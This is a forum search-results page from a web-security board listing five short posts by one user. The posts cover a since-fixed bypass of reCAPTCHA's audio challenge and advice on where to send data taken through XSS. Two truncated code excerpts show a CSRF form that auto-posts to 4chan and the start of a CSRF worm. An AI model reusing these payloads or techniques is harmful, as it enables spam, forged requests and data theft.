sla.ckers.org is ha.ckers sla.cking
Sla.ckers.org
Q and A on cross site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. For session fixation, hijacking, lockout, replay, session riding, etc.

Current Page: 1 of 1
Results 1 - 5 of 5
4 years ago
Skuld
Seems to be fixed.
> reCAPTCHA Support
> From: reCAPTCHA Support <supp...@recaptcha.net>
> Date: Tue, 3 Aug 2010 04:05:00 -0400
> Subject: Re: Does not stop spam
>
> Hi all,
>
> We've pushed a change which fixes the problem with the audio CAPTCHA.
> Thanks to everyone who brought it to our attention.
>
> Best,
> The reCAPTCHA team
Forum: Robots/Spiders/CAPTCHAs, oh my
4 years ago
Skuld
Apparently the audio captcha from reCAPTCHA doesn't actually validate anything, it only looks for a certain number of words. Just click on the audio captcha option and type in ten random words to pass the captcha. Seems like a hell of a bug to me, hope it's fixed soon.
Forum: Robots/Spiders/CAPTCHAs, oh my
4 years ago
Skuld
Send it to a site with a valid SSL cert. There may be some free hosts with SSL or you could try sending the data to a site with SSL and exposed logs.
Forum: XSS Info
6 years ago
Skuld
Here is post.htm. <script language="JavaScript" src="http://scripts.hashemian.com/js/visitorIPHOST.js.php"></script> <script type="text/javascript" language="Javascript"><!-- document.write("<fo"+"rm name='post' action='http://dat.4chan.org/b/imgboard.php' method='POST' enctype='multipart/form-data'>" +&qu
Forum: CSRF and Session Info
6 years ago
Skuld
If any of you ever go to 4chan's /b/ board, you might find this interesting. There is at this moment a pseudo-worm propagating on /b/ using CSRF and social engineering to spread. Here is the code it's using. var list = []; list[0] = "Read_about_Scientology's_'secular_book_of_morals'_recruitment_program_from_their_own_documents."; list[1] = "Truth_be_known,_those_silly_MooSlimes_
Forum: CSRF and Session Info